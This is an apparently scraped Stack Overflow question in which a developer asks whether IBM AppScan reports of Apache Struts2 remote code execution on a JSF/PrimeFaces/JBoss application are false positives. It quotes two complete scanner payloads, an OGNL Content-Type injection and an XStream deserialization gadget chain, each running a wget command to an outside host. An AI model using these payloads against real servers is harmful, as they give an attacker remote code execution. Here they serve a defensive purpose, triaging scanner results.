问题
We recently received result from IBM AppScan DAST and some of the result don't make much senses. The first 2 High issue shows the application as being Struts2 which is incorrect since it a JSF 2.2 , Primefaces 7.0.9 running on JBOSS EASP 7.2 (JSF version 2.3). I don't even seen Struts in JBOSS modules / jars.
1.High -- Apache Struts2 Remote Code Execution
Risk(s): It is possible to run remote commands on the web server. This usually means complete compromise of the server and its contents Fix: Upgrade to the latest version of Apache Struts
GET /**/main.xhtml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: %{(#_='multipart/formdata').(#
dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#conta
iner=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstanc
e(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#o
gnlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget
http://**:**/AppScanMsg.html?varId=5899').(#iswin=(@java.lang.System@getProperty('o
s.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#c
md})).(#p=new
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.
apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUt
ils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Seems like response is HTTP/1.1 200 OK which AppScan believes is a vulnerability
We were told we should check the Content-Type of request header. I have not come across any such in any of past DSAT. Has anyone done something like this before in JSF?
1.High -- Apache Struts2 REST Plugin XStream Remote Code Execution
POST /**/javax.faces.resource/charts/charts.css.xhtml?ln=primefaces&v=7.0.9 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/xml
<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value
class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource
class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is
class="javax.crypto.CipherInputStream"><cipher
class="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIterator
class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter
class="java.util.Collections$EmptyIterator" /><next
class="java.lang.ProcessBuilder"><command><string>cmd.exe</string><string>/C</string><string>"wget
http://***:**/AppScanMsg.html?varId=6107"</string></command><redirectErrorStream>fal
se</redirectErrorStream></next></iter><filter
class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>
start</name><parameter-types /></method><name>foo</name></filter><next
class="string">foo</next></serviceIterator><lock /></cipher><input
class="java.lang.ProcessBuilder$NullInputStream" /><ibuffer
/><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>fal
se</consumed></dataSource><transferFlavors
/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nasho
rn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"
/></entry><entry><jdk.nashorn.internal.objects.NativeString
reference="../../entry/jdk.nashorn.internal.objects.NativeString"
/><jdk.nashorn.internal.objects.NativeString
reference="../../entry/jdk.nashorn.internal.objects.NativeString" /></entry></map>
Seems like response is HTTP/1.1 200 OK which AppScan believes is a vulnerability
Our web.xml has the error pages defined , client side state saving
<error-page>
<error-code>404</error-code>
<location>/error/404.xhtml</location>
</error-page>
<error-page>
<error-code>500</error-code>
<exception-type>java.lang.RuntimeException</exception-type>
<location>/error/access.xhtml</location>
</error-page>
<error-page>
<location>/error/error.xhtml</location>
</error-page>
<context-param>
<param-name>javax.faces.STATE_SAVING_METHOD</param-name>
<param-value>client</param-value>
</context-param>
Anyone who has seen similar issue from DSAT ? Could some of these be false positive? Looking for feedback and some insight.
Other Issue
- IBM AppScan - Blind SQL Injection (Time Based) - JSF 2.2 & Primefaces - JBOSS 7.2 EAP
- IBM AppScan - Java Deserialization Code Execution - JSF 2.2 & Primefaces - JBOSS 7.2 EAP
- IBM AppScan - Port Listener Command Injection - JSF 2.2 & Primefaces - JBOSS 7.2 EAP
- IBM AppScan - Cross-Site Request Forgery - JSF 2.2 & Primefaces - JBOSS 7.2 EAP
Links CSRF, XSS and SQL Injection attack prevention in JSF
来源:https://stackoverflow.com/questions/61671067/ibm-appscan-struts2-issue-reported-on-a-jsf-2-2-primefaces-jboss-7-2-eap